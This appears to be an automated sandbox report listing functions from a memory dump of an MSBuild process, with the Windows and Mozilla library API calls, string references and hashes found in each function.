MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C4D9459
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C4D946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C4D947D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 1c471fbcc827a111927df87fe295ba000738f1dc1ee5074f421de42c98901048
Instruction ID: a0b6d5bafc502a608c57283fcbc265eade0eb17a01ed2211f8281e0992c246cd
Opcode Fuzzy Hash: 1c471fbcc827a111927df87fe295ba000738f1dc1ee5074f421de42c98901048
Instruction Fuzzy Hash: C201F934A081008BE700E75DEC3EE4E32749B1632EF06063AE905C6F52EB62F555855F

Function 6C4E0F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4E0F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4E0F88
GetCurrentThreadId.KERNEL32 ref: 6C4E0FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C4E1067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C4E10A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C4E114B

Part of subcall function 6C4D8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C4F1563), ref: 6C4D8BD5

free.MOZGLUE(?), ref: 6C4E1174
free.MOZGLUE(?), ref: 6C4E1186

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 424eb05462633375fb969ce56e4d6381cf3de1b42802d9e00cece66425b8132c
Instruction ID: 7e8654d3e451445a77a9ed54be134bc312a9962d6a48fb76df02ac8c33778ef7
Opcode Fuzzy Hash: 424eb05462633375fb969ce56e4d6381cf3de1b42802d9e00cece66425b8132c
Instruction Fuzzy Hash: 6E61C175A043409BDB10CF25C880FAAB7F5BFC9309F06491DE89957B12EB71E959CB82

Function 6C49E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6C4A1999), ref: 6C49EA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C49EA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C49EA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6C4A1999), ref: 6C49EA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C4A1999), ref: 6C49EAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C49EADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C49EB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C49EB27

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: ea6492d22200649e2389a3639e515c20bef783f43d68e669fb91f42ab871988f
Instruction ID: 6d622ffeb74fabf8b8621ada055c7fdc754d0ac67836686caab78d596c13a696
Opcode Fuzzy Hash: ea6492d22200649e2389a3639e515c20bef783f43d68e669fb91f42ab871988f
Instruction Fuzzy Hash: 4241A5B1A002259FDB14CF68DC80EAEBBA4FF55364F250628EC15D7794E731E90587E1

Function 6C49B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C49B61E,?,?,?,?,?,00000000), ref: 6C49B6AC

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C49B61E,?,?,?,?,?,00000000), ref: 6C49B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C49B61E,?,?,?,?,?,00000000), ref: 6C49B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C49B61E,?,?,?,?,?,00000000), ref: 6C49B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C49B61E,?,?,?,?,?,00000000), ref: 6C49B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C49B61E), ref: 6C49B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C49B61E,?,?,?,?,?,00000000), ref: 6C49B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C49B61E,?,?,?,?,?,00000000), ref: 6C49B79A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: 9b76ef144bf7b202a669e1b4782e58840cc1a5cc1829d9a41af64e2923db4f8f
Instruction ID: 943cd17f6dd0b3b41a4460020ebd542132849fe4dc29a63cae46a313e8c0d098
Opcode Fuzzy Hash: 9b76ef144bf7b202a669e1b4782e58840cc1a5cc1829d9a41af64e2923db4f8f
Instruction Fuzzy Hash: B841B4B2D001259FCB14DF68DC80EAEBBB5BB95324F250669E825E7780E731AD0587E1

Function 6C49EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C515104), ref: 6C49EFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C49EFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C49EFEC
free.MOZGLUE(?), ref: 6C49F00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C49F02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C49F041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C49F065
moz_xmalloc.MOZGLUE ref: 6C49F072

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: b0b7ff6f791d17c714e60405c8b9c7d369ca28ca4e2fd8872b2cdb38132a37c3
Instruction ID: 951de36a11ba0bf446004fc920c24f660bca3bd9b267b0df1b962d285759d837
Opcode Fuzzy Hash: b0b7ff6f791d17c714e60405c8b9c7d369ca28ca4e2fd8872b2cdb38132a37c3
Instruction Fuzzy Hash: F941D4B1A002159FDB08CF68DC80EAE7769BF95324B24022DE816DB794EB31E915C7E1

Function 6C50B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C50B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C50B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C50B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C50B5F4
__Init_thread_footer.LIBCMT ref: 6C50B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C50B61F
std::_Facet_Register.LIBCPMT ref: 6C50B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50B655

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: e3f84ced90f65ee078b3a8998f117a144ec7ad348a69f2b90161bc49820f8c15
Instruction ID: b775086c741d47820e262cb5cea9134dd8863c097c87ddaaaf7c9fa89a582a4a
Opcode Fuzzy Hash: e3f84ced90f65ee078b3a8998f117a144ec7ad348a69f2b90161bc49820f8c15
Instruction Fuzzy Hash: BE31A6B5B00104CBCB04EB69CC9EDAEB7B5EF86324B160559D906D7B40DB30A806CBD5

Function 6C4D6590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C4CFA80: GetCurrentThreadId.KERNEL32 ref: 6C4CFA8D
Part of subcall function 6C4CFA80: AcquireSRWLockExclusive.KERNEL32(6C51F448), ref: 6C4CFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4D6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C4D67C8

Part of subcall function 6C4E4290: memcpy.VCRUNTIME140(?,?,6C4F2003,6C4F0AD9,?,6C4F0AD9,00000000,?,6C4F0AD9,?,00000004,?,6C4F1A62,?,6C4F2003,?), ref: 6C4E42C4

Strings

vQl, xrefs: 6C4D696C
data, xrefs: 6C4D6593

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vQl
API String ID: 511789754-3038898261
Opcode ID: 7140b7aef5a38a4cb62d39d78f8b113de91ed65d05afefb0c53a4d5271d25192
Instruction ID: 1ca58f0a55e47d43007929b4bfa78d546f9fc0e6aae9e26de55b5f82eed7bb71
Opcode Fuzzy Hash: 7140b7aef5a38a4cb62d39d78f8b113de91ed65d05afefb0c53a4d5271d25192
Instruction Fuzzy Hash: 84D1EC74A083409FD724DF64C851F9BBBE5AFD5308F11492EE489C7B91EB30A809CB92

Function 6C4CD5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C49EB57,?,?,?,?,?,?,?,?,?), ref: 6C4CD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C49EB57,?), ref: 6C4CD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C49EB57,?), ref: 6C4CD673
free.MOZGLUE(?), ref: 6C4CD888

Strings

|Enabled, xrefs: 6C4CD81E
WIl, xrefs: 6C4CD5D9, 6C4CD63F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: WIl$|Enabled
API String ID: 4142949111-2974265463
Opcode ID: 1fa931423f2f5fb1e7dae5eea74d9391c5548f31f20a579a7ea92627f9ee4350
Instruction ID: 3eabaaa2996497216a2508bffcf05d3cbc9fa0a1d88c3261bf0d18ae69fdcb71
Opcode Fuzzy Hash: 1fa931423f2f5fb1e7dae5eea74d9391c5548f31f20a579a7ea92627f9ee4350
Instruction Fuzzy Hash: 4BA1E174B042048FDB11CF69C8C4FAEBBF1AF49318F14815CD899ABB51D735A845CBA2

Function 6C4A9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C4F7ABE), ref: 6C4A985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C4F7ABE), ref: 6C4A98A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C4A9909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C4A9918
free.MOZGLUE(?), ref: 6C4A9975

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: d311c23d4a2245916714d41f64b1c5690dccc202b49a9351506b6f56dcf905c5
Instruction ID: 1f3b54fe8fdb4670731ee4f5646758d4342688aed653af27b093465743eb4737
Opcode Fuzzy Hash: d311c23d4a2245916714d41f64b1c5690dccc202b49a9351506b6f56dcf905c5
Instruction Fuzzy Hash: FB719C746007058FC729CF68C480E56B7F5FF6A3247244AADD85A8BBA4D732F842CB91

Function 6C4AB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C4ECC83,?,?,?,?,?,?,?,?,?,6C4EBCAE,?,?,6C4DDC2C), ref: 6C4AB7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C4ECC83,?,?,?,?,?,?,?,?,?,6C4EBCAE,?,?,6C4DDC2C), ref: 6C4AB80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C4ECC83,?,?,?,?,?,?,?,?,?,6C4EBCAE), ref: 6C4AB88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C4ECC83,?,?,?,?,?,?,?,?,?,6C4EBCAE,?,?,6C4DDC2C), ref: 6C4AB896

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: 843f8a56ce0cfe57da5b04385821744085f5ca1b50ca3b6a96afa38c18299902
Instruction ID: 48a730fd83f394f4feede1b272ab9ef7ef1feb152e310979b68386fe323ae54e
Opcode Fuzzy Hash: 843f8a56ce0cfe57da5b04385821744085f5ca1b50ca3b6a96afa38c18299902
Instruction Fuzzy Hash: BB51AC747006088FDB18CF9DC888E6ABBF5FF99319B59845DE98A87745C730E802CB84

Function 6C4E1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4E1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C4E1BE3,?,?,6C4E1D96,00000000), ref: 6C4E1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C4E1BE3,?,?,6C4E1D96,00000000), ref: 6C4E1D4C
GetCurrentThreadId.KERNEL32 ref: 6C4E1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4E1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4E1DDA

Part of subcall function 6C4E1EF0: GetCurrentThreadId.KERNEL32 ref: 6C4E1F03
Part of subcall function 6C4E1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C4E1DF2,00000000,00000000), ref: 6C4E1F0C
Part of subcall function 6C4E1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C4E1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C4E1DF4

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: e86b90d38173769330e6b6560ec14cb161ebb6feef13194471e3ae628b86e5a2
Instruction ID: 2632e39d16d9a23d3713f20f23e6d6dd6e6ea9a0a2a6ce78df8f469ed638ce1c
Opcode Fuzzy Hash: e86b90d38173769330e6b6560ec14cb161ebb6feef13194471e3ae628b86e5a2
Instruction Fuzzy Hash: C54174B5200700AFCB10DF28C889E56BBF9FB89315F11442EE99A87B42DB71F854CB95

Function 6C4A38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C51E220,?,?,?,?,6C4A3899,?), ref: 6C4A38B2
ReleaseSRWLockExclusive.KERNEL32(6C51E220,?,?,?,6C4A3899,?), ref: 6C4A38C3
free.MOZGLUE(00000000,?,?,?,6C4A3899,?), ref: 6C4A38F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C4A3920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C4A3899,?), ref: 6C4A392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C4A3899,?), ref: 6C4A3943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C4A396E

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 086138788128710af0c9765e007d6adf62e390212810686106d6c6b9153820b4
Instruction ID: 26211058aa5b4207783c742c2738540ef96e03ac3138c31bf9000b94ecd00870
Opcode Fuzzy Hash: 086138788128710af0c9765e007d6adf62e390212810686106d6c6b9153820b4
Instruction Fuzzy Hash: 0E21FD72600710DFE720DF55C880F86B7E9EF95328F218429E95A97B50E730F846CB91

Function 6C4D84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D85AC

Part of subcall function 6C4D7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C4D85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D767F
Part of subcall function 6C4D7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C4D85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D7693
Part of subcall function 6C4D7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C4D85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4D85B2

Part of subcall function 6C4B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4B5EDB
Part of subcall function 6C4B5E90: memset.VCRUNTIME140(ewOl,000000E5,?), ref: 6C4B5F27
Part of subcall function 6C4B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4B5FB2

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: a115d48d209f5526a639640cd3448a4e32c647f5bbf5a0ca75a44be616fab8e1
Instruction ID: 49f3c3666a3341897f0d2d3da72f83e42f69bd8caeec2edaed5e62c82c7c4d21
Opcode Fuzzy Hash: a115d48d209f5526a639640cd3448a4e32c647f5bbf5a0ca75a44be616fab8e1
Instruction Fuzzy Hash: E621A3742016019FDB14EB24C8A8E6AB7B5AF8431DF16082DE55BC3B41EB31F948CB95

Function 6C4A1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C4A1699
VerSetConditionMask.NTDLL ref: 6C4A16CB
VerSetConditionMask.NTDLL ref: 6C4A16D7
VerSetConditionMask.NTDLL ref: 6C4A16DE
VerSetConditionMask.NTDLL ref: 6C4A16E5
VerSetConditionMask.NTDLL ref: 6C4A16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C4A16F9

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 33c8494da2c10ca3b5cb422910397c112659369b2fb452eaec48a7cb7c422f47
Instruction ID: 4b3c6d6c33f3e2d84c651f68e2658d62f5d624af62f59ad8135260f0548fe947
Opcode Fuzzy Hash: 33c8494da2c10ca3b5cb422910397c112659369b2fb452eaec48a7cb7c422f47
Instruction Fuzzy Hash: 6621D5F0740208ABFB11AB688C4AFBB737CDFD6704F014528F6459BA90C6749D5486A1

Function 6C4ED1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4ED1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4ED1F5

Part of subcall function 6C4EAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C4EAE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4ED211
GetCurrentThreadId.KERNEL32 ref: 6C4ED217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C4ED226
